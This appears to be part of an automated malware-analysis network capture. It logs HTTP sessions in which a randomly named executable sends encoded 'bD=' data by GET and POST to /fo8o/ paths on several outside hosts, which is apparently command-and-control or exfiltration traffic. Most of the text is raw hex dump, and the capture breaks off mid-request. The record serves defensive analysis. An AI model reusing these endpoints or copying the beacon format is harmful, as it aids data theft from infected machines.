61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 4e 51 43 65 61 4b 50 46 6f 58 4a 72 49 32 59 5a 45 2b 43 47 30 56 38 6a 75 47 70 6e 51 50 39 55 6d 6d 39 47 6b 54 47 4d 4e 75 6f 42 35 5a 34 57 55 66 58 41 41 44 64 48 6e 4e 47 2b 62 57 39 71 43 2b 4d 35 46 79 33 72 65 72 30 4b 67 54 48 56 47 63 33 32 68 30 6a 56 33 70 44 55 67 69 67 74 65 55 32 2b 77 6e 4d 46 36 70 6b 47 77 69 58 50 4d 56 73 6e 66 7a 45 64 69 48 7a 62 38 74 4a 33 6c 59 4f 2b 74 34 4d 4d 54 78 76 37 49 4f 43 50 59 77 71 42 4d 76 6b 4d 34 61 34 4e 57 79 66 4e 79 4c 55 6f 33 64 61 56 68 39 36 33 6d 57 33 47 54 67 33 75 34 6d 53 53 32 45 43 6e 7a 54 73 2f 46 72 4d 7a 49 79 52 78 50 67 69 45 2b 2f 33 4d 78 67 75 4f 5a 72 61 32 50 46 75 75 69 50 70 76 4c 4f 52 62 32 67 42 43 57 75 37 6b 42 4a 6c 68 45 43 71 64 39 50 32 7a 70 71 42 72 31 73 51 48 46 52 31 72 4a 7a 72 2b 43 48 46 6a 62 4d 35 78 47 6e 76 79 46 6f 43 65 6e 70 36 2b 4e 76 2f 75 6c 45 4a 44 64 73 6a 4e 52 35 4d 66 6d 4c 64 6b 31 61 51 4e 47 4a 69 56 76 49 4a 51 48 34 33 2b 32 72 74 62 30 5a 39 37 48 4e 4c 38 41 6e 61 49 77 62 39 34 2b 64 69 70 64 6a 2b 78 4c 67 45 2b 49 47 73 64 4a 49 35 76 45 4e 63 47 44 2b 33 49 2b 78 34 6f 36 66 52 6b 6c 4d 4c 61 7a 56 7a 33 33 51 55 36 55 49 58 74 33 73 71 33 43 70 79 76 62 58 2f 30 33 33 45 34 54 42 31 39 5a 4b 79 76 76 57 65 6e 73 49 50 6a 67 2f 2f 32 32 6d 41 31 51 4b 78 41 30 63 4b 6e 63 51 51 79 69 55 39 5a 69 51 79 61 39 54 30 65 59 6c 39 69 6b 75 4e 41 76 70 65 70 47 64 2b 62 67 4c 33 6d 4b 4f 75 37 4c 70 6e 45 6f 77 41 70 31 57 4a 31 76 72 78 56 58 46 49 38 43 61 56 44 33 6f 4e 34 38 68 66 72 30 53 41 54 74 46 33 6f 69 4c 37 4c 4e 78 43 62 38 61 79 37 32 53 5a 74 37 48 30 55 6c 79 6e 4a 72 73 48 46 50 41 49 32 35 65 51 36 5a 4a 7a 55 4d 47 4e 63 39 46 35 69 45 39 53 68 7a 6d 62 6b 73 48 6b 71 35 31 36 2f 75 69 76 65 56 56 73 50 73 31 46 65 67 78 41 44 38 52 6d 36 79 46 54 36 32 79 44 52 4e 63 61 65 76 4c 4e 42 4d 51 5a 50 7a 71 63 67 62 48 65 34 38 41 35 63 69 6e 39 71 58 76 4d 72 50 41 65 4a 63 70 58 47 4e 6d 63 4c 52 37 68 38 4b 55 63 71 2f 41 72 38 32 6e 6e 49 41 6c 49 56 69 54 6d 59 61 79 42 6d 69 71 6e 78 64 53 61 61 6d 4c 4e 33 4c 35 4c 62 4e 69 46 53 41 36 65 38 78 4f 52 63 2b 67 73 67 75 4b 36 4c 50 51 68 35 68 46 63 4e 49 42 6f 6d 39 31 73 76 57 71 70 77 69 62 37 36 61 33 78 4a 44 6c 59 39 44 6e 6f 77 36 76 6a 32 71 6c 39 6b 6c 73 46 4e 46 50 6b 6d 32 43 35 6d 66 4d 6a 35 45 65 53 43 66 47 67 64 64 41 52 4b 55 4d 75 46 6d 37 48 69 46 52 48 50 76 57 66 33 51 53 47 33 61 36 73 42 34 4e 53 36 77 4a 51 61 59 53 4a 55 37 6a 2f 53 55 49 66 2f 2b 71 33 76 72 79 63 6d 6d 63 44 51 48 6b 4a 36 4c 4f 73 65 49 30 68 59 72 49 54 45 6e 69 6e 43 4b 53 76 39 31 52 59 4a 49 78 53 66 56 65 43 72 73 39 79 64 6f 39 72 37 34 4c 6b 53 6c 52 62 56 48 58 43 47 79 37 32 65 6e 50 50 43 4f 36 48 39 45 30 5a 4b 6c 38 68 71 79 2f 4f 69 74 30 71 50 48 6c 57 59 67 35 66 34 61 48 4f 35 63 6f 78 68 37 79 43 63 62 72 43 30 74 69 58 77 58 76 7a 6a 34 67 46 79 6f 6a 73 37 48 4c 44 69 69 67 5a 6f 62 38 57 64 36 73 49 49 49 69 73 54 6b 68 48 66 73 41 50 70 75 69 54 4d 4e 42 32 75 77 58 72 43 6c 78 50 6c 30 46 68 53 2b 66 55 63 63 6c 55 69 42 54 2b 70 4a 70 46 6d 47 58 54 7a 6b 63 59 41 77 75 6a 71 62 44 76 67 58 4f 33 6a 53 39 46 70 50 50 52 41 72 2b 70 4f 67 3d Data Ascii: bD=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/NQCeaKPFoXJrI2YZE+CG0V8juGpnQP9Umm9GkTGMNuoB5Z4WUfXAADdHnNG+bW9qC+M5Fy3rer0KgTHVGc32h0jV3pDUgigteU2+wnMF6pkGwiXPMVsnfzEdiHzb8tJ3lYO+t4MMTxv7IOCPYwqBMvkM4a4NWyfNyLUo3daVh963mW3GTg3u4mSS2ECnzTs/FrMzIyRxPgiE+/3MxguOZra2PFuuiPpvLORb2gBCWu7kBJlhECqd9P2zpqBr1sQHFR1rJzr+CHFjbM5xGnvyFoCenp6+Nv/ulEJDdsjNR5MfmLdk1aQNGJiVvIJQH43+2rtb0Z97HNL8AnaIwb94+dipdj+xLgE+IGsdJI5vENcGD+3I+x4o6fRklMLazVz33QU6UIXt3sq3CpyvbX/033E4TB19ZKyvvWensIPjg//22mA1QKxA0cKncQQyiU9ZiQya9T0eYl9ikuNAvpepGd+bgL3mKOu7LpnEowAp1WJ1vrxVXFI8CaVD3oN48hfr0SATtF3oiL7LNxCb8ay72SZt7H0UlynJrsHFPAI25eQ6ZJzUMGNc9F5iE9ShzmbksHkq516/uiveVVsPs1FegxAD8Rm6yFT62yDRNcaevLNBMQZPzqcgbHe48A5cin9qXvMrPAeJcpXGNmcLR7h8KUcq/Ar82nnIAlIViTmYayBmiqnxdSaamLN3L5LbNiFSA6e8xORc+gsguK6LPQh5hFcNIBom91svWqpwib76a3xJDlY9Dnow6vj2ql9klsFNFPkm2C5mfMj5EeSCfGgddARKUMuFm7HiFRHPvWf3QSG3a6sB4NS6wJQaYSJU7j/SUIf/+q3vrycmmcDQHkJ6LOseI0hYrITEninCKSv91RYJIxSfVeCrs9ydo9r74LkSlRbVHXCGy72enPPCO6H9E0ZKl8hqy/Oit0qPHlWYg5f4aHO5coxh7yCcbrC0tiXwXvzj4gFyojs7HLDiigZob8Wd6sIIIisTkhHfsAPpuiTMNB2uwXrClxPl0FhS+fUcclUiBT+pJpFmGXTzkcYAwujqbDvgXO3jS9FpPPRAr+pOg=
Apr 19, 2024 03:30:40.522475004 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: -1 Vary: Accept-Encoding x-frame-options: DENY x-request-id: 3c1b5734-dcf3-4162-9b06-ab0e845d49f5-1713490240 server-timing: processing;dur=6 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=3c1b5734-dcf3-4162-9b06-ab0e845d49f5-1713490240 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=3c1b5734-dcf3-4162-9b06-ab0e845d49f5-1713490240 x-dc: gcp-us-east1,gcp-us-east1,us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UnzzLuWVueIGoY5i%2F%2BJm0BVFK0HI1Ifx1P3Tt2XcgEQAmLLFjwrhSCoqiqPZxVIpIzP2nGGiHg7Ehxdy8TfzZ%2BSxuN6vVJAQozSa9Yukhu9F7kxbaQs%2BF8O9NVF4oBLhecEg4KAeBYf5"}],"group":"cf-nel","max_age": Data Raw: Data Ascii:
Apr 19, 2024 03:30:40.522504091 CEST	208	IN	Data Raw: 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 Data Ascii: 04800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=52.000046Server: cloudflareCF-RAY: 87692172995812e3-ATLalt-svc: h3=":443"; ma=86400
Apr 19, 2024 03:30:40.522524118 CEST	1289	IN	Data Raw: 62 36 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cd 5a 7f 73 9b 46 1a fe 3f 9f 62 8d da c6 6a 85 00 49 08 24 4b ea 24 b6 d3 71 db 9b bb 36 e9 f4 e6 da ce cd 02 8b 84 8d 58 0e 90 65 35 d7 ef 7e cf ee 02 02 d9 4a 95 5c 7a bd 71 32 86 65 f7 dd f7 f7 fb Data Ascii: b6eZsF?bjI$K$q6Xe5~J\zq2e/v)#b/t($qAn4ZDlLxDL#1Ms%& =wq{T"K)@]ob4X<#df%f9+o^&?QehMk<y55
Apr 19, 2024 03:30:40.522542953 CEST	1289	IN	Data Raw: 53 e3 f0 6b 7c 29 73 03 01 cb e2 5f 7f 08 4a 07 99 e1 03 c9 34 b2 c2 07 52 80 dd 8a 8c 26 e8 ef 84 bb 8b 68 15 0c e6 84 d1 9c e9 51 a2 f3 4d 41 cc bc 96 fc a4 b9 42 b6 93 26 d6 c9 56 06 86 f0 9b 4d 3e 1d 22 17 94 ea 39 1c 2e 23 a8 31 b1 ac 4a 75 Data Ascii: Sk\|)s_J4R&hQMAB&VM>"9.#1Ju5Ran4LzGCvmd4_\v0D!!>I$[$ujH;!$'9'SxT5zW,oeWqM8!TR9dh1RB5lkL&\|q;qaK
Apr 19, 2024 03:30:40.522558928 CEST	355	IN	Data Raw: 9f aa fc 83 db c7 f3 ea 1b 39 9b 93 e7 fe 8a f9 77 80 51 9a 8d c3 73 f2 d9 67 7b e2 62 16 20 f0 d6 84 6e dd 67 55 84 15 47 b8 62 9b 13 e3 e7 fe 79 79 d5 d3 fd 59 64 ec 4f 8c 8b 7d da a8 16 34 39 e9 af 69 e1 af ce 33 d6 7d 8a b0 22 bd de 95 34 55 Data Ascii: 9wQsg{b ngUGbyyYdO}49i3}"4U>,y~1Y&@Nq]"HP#5}\|rugnEv+'8${Vg;?)FW<?m?)FX3"LyV%tp",X=()i{y!
Apr 19, 2024 03:30:40.522577047 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49756	23.227.38.74	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:43.007090092 CEST	519	OUT	GET /fo8o/?bD=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&VVq=lF_H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.donnavariedades.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 19, 2024 03:30:43.187372923 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:43 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: -1 X-Storefront-Renderer-Rendered: 1 Vary: Accept-Encoding vary: Accept x-frame-options: DENY content-security-policy: frame-ancestors 'none'; x-shopid: x-shardid: -1 powered-by: Shopify server-timing: processing;dur=7, asn;desc="212238", edge;desc="ATL", country;desc="US", pageType;desc="404", servedBy;desc="6nzr", requestID;desc="9e515b67-9f63-4a35-9be0-3571a8f90e39-1713490243" x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1 x-request-id: 9e515b67-9f63-4a35-9be0-3571a8f90e39-1713490243 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jkAIRzwgTkyOTTYddPcfEPZeYcSiSliXmWRnLC7kuAojrrsdufA7Yq%2F7ooLjfbnzpwfdT57rb5IIaghAjxuZPX%2F9HxTP97QWDcFPtBEL%2FODJJxaU9Do%2FuEXyic9bxb4nEJY3NOWlfeZy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=74.000120 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Download-Options: noopen Server: cloudflare CF-RAY: 876921831ed97b98-ATL alt-svc: h3=":443"; m Data Raw: Data Ascii:
Apr 19, 2024 03:30:43.187417030 CEST	1289	IN	Data Raw: 3d 38 36 34 30 30 0d 0a 0d 0a 32 30 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 Data Ascii: =8640020d9<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en"> <![endif]--><
Apr 19, 2024 03:30:43.187455893 CEST	1289	IN	Data Raw: 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 70 67 2d 73 74 6f 72 65 34 30 34 20 7b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 38 30 70 78 20 30 20 35 30 70 78 20 30 3b 0a 20 20 20 20 20 Data Ascii: border-radius: 25px; } #pg-store404 { padding: 80px 0 50px 0; text-align: center; } #pg-store404 h1 { font-size: 40px; font-family: 'Shopify Sans Medium'; } html, body { height: 95%;
Apr 19, 2024 03:30:43.187494993 CEST	1289	IN	Data Raw: 34 38 33 36 2f 33 30 33 30 2f 66 69 6c 65 73 2f 53 68 6f 70 69 66 79 53 61 6e 73 2d 4d 65 64 69 75 6d 2e 77 6f 66 66 32 3f 76 3d 31 36 37 34 36 31 30 39 31 36 27 29 0a 20 20 20 20 20 20 20 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 Data Ascii: 4836/3030/files/ShopifySans-Medium.woff2?v=1674610916') format('woff2'); } .new-stores-link { background: black; border-radius: 20px; color: white; font-family: 'Shopify Sans Medium'; padding: 10p
Apr 19, 2024 03:30:43.187536955 CEST	1289	IN	Data Raw: 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 35 42 35 42 35 42 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 61 72 72 6f 77 2d 6c 69 6e 65 Data Ascii: e: 14px; text-decoration: none; color: #5B5B5B; } .arrow-line, .arrow-head { transition: transform 0.3s ease-in-out; will-change: transform; } .back-button:hover .arrow-line { transform: tran
Apr 19, 2024 03:30:43.187576056 CEST	1289	IN	Data Raw: 2d 67 72 61 64 69 65 6e 74 28 2d 34 35 64 65 67 2c 20 23 43 31 45 39 46 46 2c 20 23 46 34 46 35 46 36 2c 20 23 45 31 46 43 46 46 2c 20 23 42 44 45 37 46 46 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6c 6f 72 32 20 7b 0a 20 20 20 20 20 20 Data Ascii: -gradient(-45deg, #C1E9FF, #F4F5F6, #E1FCFF, #BDE7FF); } .color2 { background: linear-gradient(-45deg, #ECEAFB, #ECF7FC, #F0EDFE, #E9E8FB); } .background-animation { background-size: 400% 400%; animation: gr
Apr 19, 2024 03:30:43.187616110 CEST	1289	IN	Data Raw: 42 35 42 35 42 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 76 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 61 63 6b 2d 62 75 74 74 6f 6e Data Ascii: B5B5B" stroke-width="2"/> </svg> <span class="back-button-text"> SHOPIFY </span> </a> <div id="shop-not-found" class="error-message"> <h1 class="tc" id="hero-t
Apr 19, 2024 03:30:43.187652111 CEST	693	IN	Data Raw: 2e 73 68 6f 77 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 Data Ascii: .show(); } } }); </script> </div> </div> </div> <div class="supporting-content"> <div id="owner"> <div class="owner-header"> Are
Apr 19, 2024 03:30:43.187690020 CEST	1289	IN	Data Raw: 32 38 64 33 0d 0a 6f 76 65 72 79 2f 73 74 6f 72 65 73 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 67 75 72 75 63 6f 70 79 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 47 75 72 75 73 22 3e 66 6f 72 67 6f 74 20 Data Ascii: 28d3overy/stores?utm_source=gurucopy&utm_medium=link&utm_campaign=Gurus">forgot your store</a> page. </div> </div> </div> <div class="push"></div> </div> ... End content --> <footer> <svg width="15
Apr 19, 2024 03:30:43.187728882 CEST	1289	IN	Data Raw: 31 36 2e 38 38 39 20 31 32 2e 39 34 31 34 43 31 31 37 2e 30 30 38 20 31 32 2e 33 35 33 34 20 31 31 37 2e 30 37 34 20 31 31 2e 37 35 36 32 20 31 31 37 2e 30 38 38 20 31 31 2e 31 35 36 36 43 31 31 37 2e 30 38 38 20 39 2e 36 31 35 30 35 20 31 31 36 Data Ascii: 16.889 12.9414C117.008 12.3534 117.074 11.7562 117.088 11.1566C117.088 9.61505 116.275 8.6834 114.848 8.6834Z" fill="black"/> <path d="M123.273 8.68336C119.983 8.68336 117.802 11.6577 117.802 14.9683C117.802 17.0894 119.11 18.7935 121.56
Apr 19, 2024 03:30:43.187766075 CEST	1289	IN	Data Raw: 32 32 33 36 33 43 31 33 39 2e 34 34 32 20 35 2e 33 37 31 30 33 20 31 33 39 2e 33 32 37 20 35 2e 35 34 35 38 34 20 31 33 39 2e 32 35 20 35 2e 37 33 37 39 32 43 31 33 39 2e 31 37 33 20 35 2e 39 32 39 39 39 20 31 33 39 2e 31 33 35 20 36 2e 31 33 35 Data Ascii: 22363C139.442 5.37103 139.327 5.54584 139.25 5.73792C139.173 5.92999 139.135 6.13548 139.138 6.34244C139.138 7.15525 139.654 7.71132 140.427 7.71132H140.466C141.32 7.71132 142.053 7.13619 142.073 6.12495C142.068 5.33344 141.533 4.75831 140.7 4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49757	34.111.148.214	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:49.281229019 CEST	772	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6b 38 49 71 59 6a 43 7a 72 6b 6e 71 78 6c 42 78 35 70 5a 6a 48 37 48 51 6f 33 33 56 6e 4e 4a 72 64 76 4c 2b 69 6b 6b 4f 71 77 75 78 48 64 32 43 33 33 31 45 37 55 6c 43 70 79 65 5a 55 37 2f 37 62 31 55 47 42 61 6e 55 50 36 50 66 52 70 71 53 54 70 39 69 47 4a 68 2f 4a 45 41 4f 6f 74 78 50 51 53 71 30 43 62 44 6e 33 4c 32 45 2b 63 6f 35 56 39 67 76 6f 71 6b 79 49 6e 54 43 69 35 73 55 55 30 64 55 73 32 39 38 48 55 79 30 33 4e 46 66 35 44 6f 4e 56 6b 33 67 49 2f 32 31 58 7a 41 68 6f 68 70 49 34 79 4d 4a 6b 56 71 4a 42 79 64 54 4b 58 53 76 6e 58 5a 66 33 57 2b 44 72 58 61 61 Data Ascii: bD=gB7R/rxgLjsQk8IqYjCzrknqxlBx5pZjH7HQo33VnNJrdvL+ikkOqwuxHd2C331E7UlCpyeZU7/7b1UGBanUP6PfRpqSTp9iGJh/JEAOotxPQSq0CbDn3L2E+co5V9gvoqkyInTCi5sUU0dUs298HUy03NFf5DoNVk3gI/21XzAhohpI4yMJkVqJBydTKXSvnXZf3W+DrXaa
Apr 19, 2024 03:30:49.575201035 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Fri, 19 Apr 2024 01:30:49 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close
Apr 19, 2024 03:30:49.578047991 CEST	559	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49758	34.111.148.214	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:51.910639048 CEST	796	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 74 72 64 50 62 2b 6a 6e 38 4f 70 77 75 78 49 39 32 62 6f 48 31 4e 37 55 70 4b 70 79 79 5a 55 37 62 37 62 77 77 47 42 70 2f 54 4a 36 50 64 64 4a 71 51 63 4a 39 69 47 4a 68 2f 4a 45 45 30 6f 74 35 50 51 69 36 30 44 34 62 67 72 62 32 44 33 38 6f 35 66 64 67 72 6f 71 6b 55 49 6d 2f 34 69 36 45 55 55 32 46 55 73 45 46 37 4e 55 79 2b 36 74 45 31 39 54 5a 35 4d 6c 4b 42 57 4d 57 43 49 41 63 39 6b 33 6f 53 6b 42 4d 71 32 46 4b 4c 42 77 46 68 4b 33 53 46 6c 58 68 66 6c 42 79 6b 6b 6a 2f 35 64 57 77 74 4a 78 36 7a 68 34 4b 4a 54 59 71 2b 61 74 43 43 51 51 3d 3d Data Ascii: bD=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/trdPb+jn8OpwuxI92boH1N7UpKpyyZU7b7bwwGBp/TJ6PddJqQcJ9iGJh/JEE0ot5PQi60D4bgrb2D38o5fdgroqkUIm/4i6EUU2FUsEF7NUy+6tE19TZ5MlKBWMWCIAc9k3oSkBMq2FKLBwFhK3SFlXhflBykkj/5dWwtJx6zh4KJTYq+atCCQQ==
Apr 19, 2024 03:30:52.204716921 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Fri, 19 Apr 2024 01:30:52 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close
Apr 19, 2024 03:30:52.207983017 CEST	559	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49760	34.111.148.214	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:54.553617001 CEST	1809	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 6c 72 64 38 44 2b 6a 47 38 4f 6f 77 75 78 46 64 32 47 6f 48 30 4e 37 56 42 4f 70 79 4f 6a 55 35 54 37 61 57 38 47 48 63 54 54 63 4b 50 64 56 70 71 64 54 70 39 33 47 4e 46 37 4a 45 30 30 6f 74 35 50 51 6b 57 30 45 72 44 67 70 62 32 45 2b 63 6f 31 56 39 67 54 6f 71 39 68 49 6d 36 61 69 4b 6b 55 55 57 56 55 2f 48 39 37 42 55 79 77 39 74 45 74 39 54 56 6d 4d 6c 57 6a 57 4e 7a 58 49 43 41 39 68 51 56 51 68 45 73 57 6b 45 57 32 41 48 6f 4c 55 79 6d 46 67 57 78 